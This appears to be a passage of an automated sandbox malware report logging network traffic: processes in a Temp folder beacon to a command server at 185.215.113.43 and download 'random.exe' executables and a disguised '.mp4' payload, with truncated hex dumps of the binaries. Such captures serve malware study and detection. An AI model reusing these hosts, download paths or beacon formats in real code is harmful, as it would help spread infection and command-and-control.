                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.042866945 CET1236INData Raw: 02 28 bf 03 00 06 6f 00 02 00 06 2a 32 02 7e 43 00 00 0a 6f c8 03 00 06 2a 92 02 7c 99 00 00 04 03 28 54 00 00 0a 02 7c 9b 00 00 04 03 28 54 00 00 0a 02 28 b8 03 00 06 73 b3 03 00 06 2a f2 02 28 e1 03 00 06 03 7e 43 00 00 0a 28 c9 00 00 0a 39 01
                                                                                                                                                                                                                                              Data Ascii: (o*2~Co*|(T|(T(s*(~C(9*|(T}|(T}*2~Co*2~Co*~%(R9r1psz(}|(T}*~%(R9r1psz(


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              3192.168.2.463806208.109.77.116801748C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.426939011 CET85OUTGET /panel/uploads/Luvzkkz.mp4 HTTP/1.1
                                                                                                                                                                                                                                              Host: wasni.care
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090641975 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:11 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                              Connection: Upgrade, Keep-Alive
                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Nov 2024 03:43:31 GMT
                                                                                                                                                                                                                                              ETag: "b407f4-180c10-625e5dafbbeb5"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Content-Length: 1575952
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Keep-Alive: timeout=5
                                                                                                                                                                                                                                              Content-Type: video/mp4
                                                                                                                                                                                                                                              Data Raw: 83 a2 1f 71 4c 4e 68 f0 ec b8 82 2b f1 ab e5 f6 5d 21 41 36 23 c4 4d 12 3d ea 57 ce 91 04 7c 56 f1 63 06 ab 55 0b 78 91 70 fc 59 f0 17 2f 01 1b 38 f7 37 cf 0c a4 a7 6d 93 9a 62 a5 53 cc db 2a a2 56 70 48 90 12 c8 02 3c b6 3a 6c f5 e9 6d 4b 23 23 e8 75 9b 95 ca 2b d4 45 3e e0 23 2d 22 83 f8 db b9 54 b8 56 a4 bd 5f f4 f8 d2 5e 72 e4 08 6f 4d 15 e6 b5 f0 4e 1d 06 dc 0c d9 9f 03 75 0f 63 a2 06 ac 6d 2b 3c 30 9e 6b f1 55 61 6e 2e e5 c6 9f 00 d4 04 66 7e 99 7a 0b 98 ad 02 08 d8 b1 96 d8 31 7c 33 a9 38 20 34 9e aa 7b 36 1d a6 a7 5a dd 46 8e 45 70 e5 dd 93 84 ac e3 c9 07 cd 3c e6 54 8b 5f cf 34 ef 0e f9 ed fc 1a d1 1e 1a e1 80 43 1b ab de db 96 9a 56 b5 33 6b 6d b3 81 d5 65 1f e3 de d9 4c 92 8d 22 56 f4 48 74 41 c5 dc b3 46 32 3f 4c 52 30 dc f0 64 31 9e a4 fe 91 9b cb 82 a1 0e 11 40 05 b6 d7 cd 5b d8 ca b4 32 8c 32 48 13 1b 20 c9 d1 fb 13 a3 ea a6 23 3f d4 44 54 9b 91 72 19 32 2a 87 27 94 e9 39 8b 36 fc 94 44 69 61 bc 5c 91 39 ed 9c 19 a0 0c 17 e2 57 59 e4 89 6f 8b 5b 2a 4b e6 7f 76 c3 ec 64 ed 7c d4 6f fb [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: qLNh+]!A6#M=W|VcUxpY/87mbS*VpH<:lmK##u+E>#-"TV_^roMNucm+<0kUan.f~z1|38 4{6ZFEp<T_4CV3kmeL"VHtAF2?LR0d1@[22H #?DTr2*'96Dia\9WYo[*Kvd|ot9B2<R9c_qkk_GF~&=-f,t&L*y4xd.@#0enNiQxT[-px~3<mg;W_BS>'V6@sJzyRx>Zx$*|<PrG/b;Qvl#yGHl'('ye'Xz+>"W]1:u-so*!s"ap}X|lp\0),-fqJ46wo@! t4{h1i/b0`ZFg&b]`|^%Qhy@w-PW95:&m&6z5rP.S=E? ;,8-=<kABxkr7@&LLs}|g7.oi_\y
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090756893 CET1236INData Raw: 1f 2b 2e da b7 04 a2 81 2d ef 2c ea 40 26 2a c6 4d 39 a4 fc 71 87 0e de 3b 57 f3 76 b9 6d d4 72 74 8d f9 5d 2d cd 65 db fc 24 34 25 7c ba 13 7c 88 48 09 69 06 12 cb 48 6d 72 af bd 71 c0 62 ef 99 8c 26 71 85 ce 3e 89 ec b7 84 5e 4f c6 47 81 90 9b
                                                                                                                                                                                                                                              Data Ascii: +.-,@&*M9q;Wvmrt]-e$4%||HiHmrqb&q>^OG@=|sSXR3ByaLnI<p^ttK;O"SR%$8nttXw/NtD,@Bx\z0H7dt*pA7wA$N}LZMfB5p>
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090771914 CET1236INData Raw: 45 93 9e b9 4b c5 83 99 04 f8 1b 98 32 a2 82 f6 f2 30 3d a4 da 89 60 88 23 45 03 9e ad e1 2d f2 f0 cc 69 95 03 82 44 78 ef 31 d9 0a a4 11 5c de 7c 14 ee 3d b9 77 6b 8d 16 4f b6 7e 53 a5 3e c2 ff 03 0f 87 b1 72 5a 90 07 5a 9a d4 02 60 8b 2f 70 d0
                                                                                                                                                                                                                                              Data Ascii: EK20=`#E-iDx1\|=wkO~S>rZZ`/pAnIe-L1}pMl<Fah-X%4IAr,;NH'\ojvl_@cZzJGVLRt/]"tU d-K(RI&gQQ
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090781927 CET1236INData Raw: 72 7a 6b 85 8b 73 97 01 28 34 ec 73 8a cb 6c 66 4b 5a 6e e3 66 a4 bd 56 00 db c3 7c 24 b9 0d 20 bf d5 1c c1 48 32 05 09 26 53 22 2b b1 21 71 01 1e 20 9d 3e 36 e4 42 93 13 ec b5 80 d9 f5 a6 33 ec 3f 60 a8 80 14 25 58 58 a0 88 23 a3 5b cb 36 20 56
                                                                                                                                                                                                                                              Data Ascii: rzks(4slfKZnfV|$ H2&S"+!q >6B3?`%XX#[6 V'EEf%(886## rB4Z)OSV'T~2yt72Z-t/ZQezi-m9HP$%_g4u]G[e)k8z#\4?3Mz:JL,
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090792894 CET848INData Raw: 4c 9f 05 d5 e0 b6 b9 30 69 2d 30 3f fd a2 38 8e d5 7a 16 f7 50 e9 38 7a 4b b7 9a 6a 5e 65 46 25 7c 95 28 27 58 ac 90 5c 26 0f e5 7a 9e ba ba 3f 0e 1d f4 44 3e fb 5f 8f 66 34 fb 41 4d 09 0a 3d 4b 3f 88 d1 13 de 13 e9 0a 94 0a 03 ff 18 12 e8 32 d8
                                                                                                                                                                                                                                              Data Ascii: L0i-0?8zP8zKj^eF%|('X\&z?D>_f4AM=K?2_6ySV%`@C0O#$BR2Zm)p9"+l0.Nu$9D5kWB-yPaLf2"iwYBu(KS
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090802908 CET1236INData Raw: 41 2b 7c be ec fe 67 c8 03 ff b5 36 4e 25 cb 25 db dd 09 81 27 a6 3b 21 34 e4 be d8 7a 02 c5 c8 6c 37 e4 99 c7 52 ec c5 44 10 4f 6b 55 36 87 9e 56 26 43 2d d9 18 fd ee 36 ea 3b ab 21 17 cb 8f da da b4 0d e6 9c 69 6a d9 d2 f6 f3 08 7a c7 4b 49 77
                                                                                                                                                                                                                                              Data Ascii: A+|g6N%%';!4zl7RDOkU6V&C-6;!ijzKIw<Ps-XH2EK<zCl)u/s b@u.Z9RgVn'U`r9gqzP`JK[{\ES)18_O#E! IOJGMB|g[-
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090814114 CET1236INData Raw: c2 11 fa f3 a7 0a 78 3b d9 8e 65 ba a1 80 c8 95 2e 1d 81 6c ae a2 dc 0e 70 c6 a5 17 76 18 34 ba 10 3e 16 12 a9 fa ad 4d 66 0e 07 6c 3f a7 60 35 69 74 5b 77 ee ed 00 ea 69 49 65 12 7d 85 16 22 22 03 43 0f 9a d9 a8 bf 85 70 b9 8c 58 e7 2f 0b e6 b6
                                                                                                                                                                                                                                              Data Ascii: x;e.lpv4>Mfl?`5it[wiIe}""CpX/%3OpDCL1KHja)@uK!h=hL"wRp5(5JoFl;2]0Yj/IZ@MNRGB!3Ti5Ap!!
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090826035 CET1236INData Raw: ae 39 41 e2 f8 26 68 89 a7 71 12 7a 9c a3 0e e0 21 3c 65 f0 4b 89 86 78 d0 63 ef 38 07 97 c3 20 6c c8 3e 93 aa 8a b0 cf 30 a9 39 c1 c1 25 6a d1 96 04 e1 63 15 4e 36 10 aa 12 16 36 0c 90 de 18 9c 7b 4e 67 37 63 0c f1 0d a0 7b b2 0a 4f b8 3a ca c0
                                                                                                                                                                                                                                              Data Ascii: 9A&hqz!<eKxc8 l>09%jcN66{Ng7c{O:9_^H5A`tb3sM}A&yRx\d'E=wRqV.$D~Kx#F?o+YMOfnoX*:q"v5[5!EvbaE9y,o;
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090835094 CET636INData Raw: 1e 8c 74 93 3b fb 79 fc e5 73 1f 48 7b 26 04 ad d3 38 8a 46 cb 31 ee aa c6 b8 d8 d3 c8 1a 51 83 06 a6 7c 11 0f 4f 11 ec 3a c2 6b 7d b0 f2 86 19 f8 12 14 3b 10 5a 3e dc 3d 30 a3 e8 9d 60 43 f9 93 c1 93 7a 77 ae 4a 53 38 b4 65 8b bc 2b b6 2f 7b 2f
                                                                                                                                                                                                                                              Data Ascii: t;ysH{&8F1Q|O:k};Z>=0`CzwJS8e+/{/$dhR@_iT7y5B^A4`4Ww"N(sD7ECel:VHx},V?E c<a*/S*#AAet6[fwuv
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.090845108 CET1236INData Raw: 6f 8a 00 3e 3d 17 ed ef 7c 4d d9 71 30 12 4d bc f3 48 bc 4d a1 93 c4 a8 fe ef 47 e4 1f 8f b9 fd 5c 8e 3c b7 7d 7e 53 2d 21 24 fc 7f 3d ae 08 50 a2 37 97 28 3b 74 d6 06 5e 9d 12 40 b0 10 7c db fa eb ea b8 7b d2 48 0b 3e a9 fa 00 19 1d e1 9f ba bf
                                                                                                                                                                                                                                              Data Ascii: o>=|Mq0MHMG\<}~S-!$=P7(;t^@|{H>pCZ\p_CS[\~C&D@q(HD0F_hS'HM,;pFyBS)[/mv,88f(<9-=*L=llkr9I\M2W]EV
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.095634937 CET1236INData Raw: cb e4 98 7b 95 8f c0 8d 7e 65 90 a5 a2 6f 9c 1c 26 91 c2 b7 96 b2 7b 02 8e 9f 7e 6e eb e6 4c a0 80 54 07 37 c9 43 57 a2 53 66 e6 33 92 fb 58 21 65 89 17 a9 20 50 2c d6 bb e3 20 16 17 cf 9c 8f 00 5b ee 2b b4 75 ad 1e 19 63 a7 15 b4 93 13 47 91 66
                                                                                                                                                                                                                                              Data Ascii: {~eo&{~nLT7CWSf3X!e P, [+ucGf%PH6F"*h[p2z@ftFi.jT,[&YJ(1AOx@fTA-,Z_E.jx&,Glv:/]hBC^/vE6*[Q


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              4192.168.2.463813185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.766926050 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 65 31 3d 31 30 30 33 33 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                              Data Ascii: e1=1003334001&unit=246122658369
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.727948904 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:12 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              5192.168.2.463819185.215.113.16805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.920085907 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854533911 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:13 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 2964480
                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Nov 2024 05:22:32 GMT
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              ETag: "6725b718-2d3c00"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 50 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 30 00 00 04 00 00 90 79 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJP0@0y-@Th@ ~@.rsrc@@.idata @zjitwqld**@mduizhsw@0-@.taggant0P0"-@
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854578018 CET112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854588985 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854608059 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854619980 CET424INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854718924 CET1148INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: 7Y 908QA9Tcv"6FoBFzcWDV\Id`vMwJBbG{aUC#lU{QlGd.zq+U^cR
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854804993 CET1236INData Raw: fc 7d 88 1b 91 f0 1a a1 37 2c 68 87 01 5b 6d c5 e5 e9 54 55 85 68 93 fe 67 41 e6 40 c0 4f e3 6d 01 61 4a d6 80 b1 cd 7b df d2 5d 8c e9 28 6d ca eb 73 1c f0 fb 37 34 5e c4 ed f9 bc 97 e5 e8 6a 81 7f f1 f1 d3 94 5b 41 f9 69 89 9b 05 27 20 ae e0 dc
                                                                                                                                                                                                                                              Data Ascii: }7,h[mTUhgA@OmaJ{](ms74^j[Ai' 88]:zy}Ip AAdx3Yz"VG7|UtY5)id{<6Lyg"+tW5,Hi:7h4%x#T*:I&XK ,p[:TTr;'0j:CFEieFi
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854841948 CET1236INData Raw: e4 64 53 7f 43 6b ab cf 01 7a 02 5b 8c 95 67 62 b9 f0 03 ae 89 bf 92 4c ee 67 44 04 3a 23 bb f8 99 34 2b 6a a8 a4 5e 84 f0 25 fd 8f 75 c0 ee 55 0f 2c da 6a b0 84 a0 14 5b 75 f1 17 54 b9 6d 0f a3 fc 22 e4 07 f7 93 95 6d ef 42 39 31 69 0a 27 8c 2a
                                                                                                                                                                                                                                              Data Ascii: dSCkz[gbLgD:#4+j^%uU,j[uTm"mB91i'*~<*%)Q3|O#(l3n5ajVWjHhI`y4#<+kjXcaZoXlVgS'n}|&g{%zDc~ "v1kb!Q6D.t
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854854107 CET1236INData Raw: eb dd 34 72 d5 f3 cb 75 ba e8 ce 22 a1 ef 65 92 ff e2 1a 12 14 3c 74 24 19 63 e3 56 c1 7f f2 29 e1 c7 64 60 e4 a6 18 69 66 e8 5b c3 3a eb ab 1b f8 e3 41 39 01 72 ca 96 58 b1 b3 1e 16 4a 02 82 94 77 68 c8 06 1a bc 08 c8 2c eb d7 e8 aa 19 1b 23 30
                                                                                                                                                                                                                                              Data Ascii: 4ru"e<t$cV)d`if[:A9rXJwh,#0Qu%V\h8)}X<z9P#cq7mKlL`:/wQsW$RT=T>j-sp^cC\!8U}Te7nb+2K \3~`
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854861021 CET1236INData Raw: 82 c4 b0 ca fd 39 de bd e3 7b d7 cb 68 7b 17 9d 04 c7 3b 33 06 19 59 dd 84 3e 75 40 f6 64 65 79 04 f5 a8 13 0d b5 fe 3e fd ba 75 d5 a9 91 35 61 b7 56 d9 8a ad 3b 69 06 86 e3 e0 0c fd b3 28 ac 49 fb 1a 54 63 e9 c2 49 7a c3 02 a6 e7 aa 08 51 ec 94
                                                                                                                                                                                                                                              Data Ascii: 9{h{;3Y>u@dey>u5aV;i(ITcIzQy~qAFs'{CE!C@gnnw7+hyFyo(S$*33C*dsg]v*WH<22!d69F8lJ&k&*G$rkQPnx3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859590054 CET1236INData Raw: 13 f8 c6 3a a7 5a d1 56 d3 8f b1 46 7a 0f 5c 4d b0 e0 8e b4 48 c3 98 d8 21 01 61 58 73 2f 01 5b fa d6 cd d0 c7 08 ab 6f 19 b2 5d 4b 3a 53 9f ee 19 cf cc 57 08 22 9f a8 a5 4b 6b 4c 31 3f 6d 6f 46 eb 21 b7 4e de a1 fe 84 7e 42 55 43 35 af 92 dc 76
                                                                                                                                                                                                                                              Data Ascii: :ZVFz\MH!aXs/[o]K:SW"KkL1?moF!N~BUC5vS?~M{)7FR`q]!z|S'dp+CiqumSLdacRTEMy!,up<3<@dFw:4UyD_dN


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              6192.168.2.463856185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.390825987 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 30 33 33 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                              Data Ascii: d1=1003343001&unit=246122658369
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.309251070 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:20 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              7192.168.2.463862185.215.113.16805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.328082085 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270492077 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:21 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 2143744
                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Nov 2024 05:22:46 GMT
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              ETag: "6725b726-20b600"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 73 00 00 04 00 00 2b ac 21 00 02 00 40 80 00 00 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, s@Ps+!@P.d. p.v@.rsrc .@.idata .@ `*.@onvelaogY@dkmdjfdjs @.taggant0 s" @
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270546913 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270561934 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270580053 CET636INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270595074 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 95 80 38 1b 4f 9e 78 97 46 ad 47 9c af ad 7a 95 75 31 c2 80 08 2d 53 d9 9d 64 fa 90 18 59 43 15 09 f6 33 e2 79 a2 38 75 6e 31 d4 b2 57 b7 c0 a0 d1 11 43 4a 7d ee 42 cb 80 bc 84 74 7a
                                                                                                                                                                                                                                              Data Ascii: 8OxFGzu1-SdYC3y8un1WCJ}Btz9`Bl0GmTHU5yDV,C=NLIL+O<T^<l*k",z`x|U:0e?PGc75]LQ[!i.w>N.eP_"!
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270612001 CET212INData Raw: 78 5c cf bc 60 5f 4a d0 9c c4 b3 43 d0 1b 22 1b b7 7d 1e 27 d5 07 15 e3 16 e7 9d 3e b7 c0 ec ea 1c b2 7c ce 29 29 52 a3 58 82 c5 87 25 a0 a7 bb d7 73 fd 0e a5 68 a4 1b d9 5d 0e 27 a6 52 e4 bb e6 35 d7 bc 12 29 a8 ab b0 e0 4e 80 3c 79 ea 7b 13 9f
                                                                                                                                                                                                                                              Data Ascii: x\`_JC"}'>|))RX%sh]'R5)N<y{Plq^j(9}LkX}!/?`49NpO/d)-V"![G4S>aQFt1`p.yHCIt&{
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270626068 CET1236INData Raw: fd 27 2f 3e 66 89 0f 92 88 c7 2f 68 e1 ad 91 01 ce e5 11 9d be ae 67 c7 8a 14 2c c7 9f 0d 60 7a 08 b6 5f 47 fd 72 3d 47 f2 5d 78 7b e7 c7 83 48 dc a1 8f bb d8 d2 c4 a7 3a 76 fe 4c 24 6b ed 66 91 9e 43 b3 eb a6 e9 72 c7 4a 66 7f ab 1d b0 8d d8 e9
                                                                                                                                                                                                                                              Data Ascii: '/>f/hg,`z_Gr=G]x{H:vL$kfCrJf=-.9 g`VX#H~Xxm,opyYTNdXB9|[[G5#`mC[=( ]W=%.U,0#c35i':3
